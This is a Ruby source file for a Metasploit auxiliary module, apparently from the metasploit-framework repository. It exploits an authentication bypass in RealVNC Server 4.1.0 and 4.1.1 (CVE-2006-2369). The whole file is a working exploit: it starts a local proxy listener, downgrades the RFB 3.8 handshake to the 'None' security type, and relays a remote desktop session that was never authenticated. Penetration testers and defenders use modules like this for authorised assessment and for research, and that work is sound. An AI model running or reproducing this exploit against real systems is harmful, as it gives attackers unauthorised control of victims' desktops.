GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
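class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # RFB 3.8 security type "None" (no authentication).
  RFB_SECTYPE_NONE = 1
  # RFB 3.8 SecurityResult word meaning "OK"; any other value is a failure.
  RFB_SECURITY_OK = "\x00\x00\x00\x00".b.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RealVNC NULL Authentication Mode Bypass',
        'Description' => %q{
          This module exploits an Authentication bypass vulnerability
          in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
          listener on LPORT and proxies to the target server.

          The AUTOVNC option requires that vncviewer be installed on
          the attacking machine.
        },
        'Author' => [
          'hdm', # original msf2 module
          'theLightCosine'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['BID', '17978'],
          ['OSVDB', '25479'],
          ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
          ['CVE', '2006-2369'],
        ],
        'DisclosureDate' => '2006-05-15',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The port the target VNC Server is listening on', 5900 ]),
        OptPort.new('LPORT', [true, 'The port the local VNC Proxy should listen on', 5900 ]),
        OptBool.new('AUTOVNC', [true, 'Automatically launch vncviewer from this host', false])
      ]
    )
  end

  # Entry point: accepts one local viewer connection, drives the authentication
  # bypass against the target, then relays bytes until either side disconnects.
  # Returns nil. Every socket and the optional viewer thread are torn down in
  # +ensure+, so the early-return paths no longer leak the listener.
  def run
    listener = start_listener

    if datastore['AUTOVNC']
      unless check_vncviewer
        print_error('The vncviewer does not appear to be installed, exiting...')
        return nil
      end
      viewer = launch_viewer
    end

    # Only the first peer is served; the listener is closed right afterwards so
    # nothing else can queue up behind it.
    client = listener.accept
    add_socket(client)
    listener.close

    server = connect
    return nil unless bypass_auth(client, server)

    print_good('Server accepted the null authentication type, proxying the session')
    proxy_traffic(client, server)
    nil
  ensure
    [server, client, listener].each { |sock| close_quietly(sock) }
    begin
      viewer&.kill
    rescue StandardError
      nil
    end
  end

  # True when a vncviewer binary (Unix or Windows name) can be found on PATH.
  # Rex::FileUtils.find_full_path yields the resolved path or nil.
  def check_vncviewer
    viewer = Rex::FileUtils.find_full_path('vncviewer') ||
             Rex::FileUtils.find_full_path('vncviewer.exe')
    !viewer.nil?
  end

  private

  # Binds the local proxy port. The listener is bound on every interface and
  # hands the first peer that connects straight into the bypassed session with
  # no authentication of its own, so LPORT must not be reachable by untrusted
  # hosts while the module runs.
  def start_listener
    print_status('Starting listener...')
    Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['LPORT'],
      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
    )
  end

  # Spawns vncviewer in a framework thread pointed at the local proxy port and
  # returns the thread. The argv form of +system+ bypasses the shell, so the
  # LPORT value is passed as a plain argument rather than interpolated into a
  # command line.
  def launch_viewer
    print_status('Spawning viewer thread...')
    framework.threads.spawn('VncViewerWrapper', false) do
      system('vncviewer', "127.0.0.1::#{datastore['LPORT']}")
    end
  end

  # Reads exactly +length+ bytes from +sock+, looping over short reads.
  # Returns nil on EOF or a socket error.
  def read_exact(sock, length)
    buf = ''.b
    while buf.bytesize < length
      chunk = sock.read(length - buf.bytesize)
      return nil if chunk.nil? || chunk.empty?

      buf << chunk
    end
    buf
  rescue ::IOError, ::SystemCallError
    nil
  end

  # Performs the RFB 3.8 version and security handshake in the middle: the
  # client is offered only "None", the server is sent "None" as the chosen
  # type, and the client is told "OK" only after the server itself reports
  # success. Returns true when the session is authenticated, false otherwise
  # (with the reason already printed).
  def bypass_auth(client, server)
    server_hello = server.get_once
    # get_once returns nil if the server closed before sending its banner.
    unless server_hello&.include?('RFB 003.008')
      print_error('The server is not vulnerable')
      return false
    end

    # put is byte-exact; puts would append a newline to a partial banner.
    client.put(server_hello)
    client_hello = client.get_once
    if client_hello.nil?
      print_error('Client closed connection')
      return false
    end
    server.put(client_hello)

    # Security-types message: a count byte followed by that many type bytes.
    # A count of zero means the server refused the handshake. Reading the
    # whole list (rather than a fixed two bytes) keeps the stream aligned when
    # the server advertises more than one type.
    count = read_exact(server, 1)&.ord
    if count.nil? || count.zero? || read_exact(server, count).nil?
      print_error('Server did not offer any security types')
      return false
    end

    print_status('Auth methods received. Sending null authentication option to client')
    client.put([1, RFB_SECTYPE_NONE].pack('CC'))
    # The client's chosen type can only be "None"; we just need it to answer.
    if read_exact(client, 1).nil?
      print_error('Client closed connection')
      return false
    end
    server.put([RFB_SECTYPE_NONE].pack('C'))

    # Do not tell the client "OK" until the server's SecurityResult says so;
    # a fixed server answers with a non-zero status here.
    result = read_exact(server, 4)
    unless result == RFB_SECURITY_OK
      print_error('Server rejected the null authentication type; the target is likely patched')
      return false
    end
    client.put(RFB_SECURITY_OK)
    true
  end

  # Shuttles bytes between the two sockets until either side closes. A short
  # select timeout (instead of 0) avoids spinning the CPU while idle.
  def proxy_traffic(client, server)
    sockets = [client, server]
    loop do
      ready, = select(sockets, nil, nil, 1)
      next if ready.nil?

      return unless !ready.include?(client) || relay(client, server, 'Client')
      return unless !ready.include?(server) || relay(server, client, 'Server')
    end
  end

  # Copies one chunk from +from+ to +to+. Returns false once +from+ has closed
  # or errored, printing which side went away.
  def relay(from, to, label)
    data = from.get_once
    if data.nil?
      print_error("#{label} closed connection")
      return false
    end
    to.put(data)
    true
  rescue StandardError
    print_error("#{label} closed connection")
    false
  end

  # Closes +sock+ if it is open, tolerating nil and already-closed sockets.
  def close_quietly(sock)
    return if sock.nil? || sock.closed?

    sock.close
  rescue StandardError
    nil
  end
end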